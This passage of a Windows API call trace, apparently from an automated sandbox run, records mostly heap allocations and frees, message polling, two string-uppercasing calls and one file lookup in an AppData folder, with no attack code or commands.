lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0195.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0195.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0195.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0195.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0195.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0195.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0195.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0195.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0195.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0195.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0195.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0195.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0195.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0195.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0195.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0195.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0195.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0195.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0195.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0195.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0195.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0195.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0195.167] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0195.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0195.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.167] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0195.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0195.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.168] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.168] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0195.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0195.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0195.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0195.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0195.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0195.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0195.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0195.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0195.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0195.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0195.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0195.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0195.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0195.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0195.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0195.170] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0195.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0195.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0195.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0195.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0195.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0195.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0195.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0195.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0195.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0195.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0195.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0195.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0195.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0195.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0195.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0195.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0195.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0195.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0195.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0195.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0195.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.172] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0195.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0195.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0195.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0195.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0195.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0195.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0195.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0195.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.173] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0195.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0195.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0195.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0195.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0195.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0195.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0195.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0195.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0195.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0195.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0195.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.174] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/AX5eJBJ82y3.jpg", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb17d7350, ftCreationTime.dwHighDateTime=0x1d4d237, ftLastAccessTime.dwLowDateTime=0x74f69c30, ftLastAccessTime.dwHighDateTime=0x1d4cb53, ftLastWriteTime.dwLowDateTime=0x74f69c30, ftLastWriteTime.dwHighDateTime=0x1d4cb53, nFileSizeHigh=0x0, nFileSizeLow=0x14d34, dwReserved0=0x9d10039, dwReserved1=0x114f1, cFileName="AX5eJBJ82y3.jpg", cAlternateFileName="AX5EJB~1.JPG")) returned 0xaa58a0 [0195.175] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0195.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0195.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.175] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0195.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0195.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0195.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0195.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0195.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0195.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0195.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0195.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0195.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.177] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0195.177] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0195.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0195.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0195.177] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0195.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0195.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0195.178] 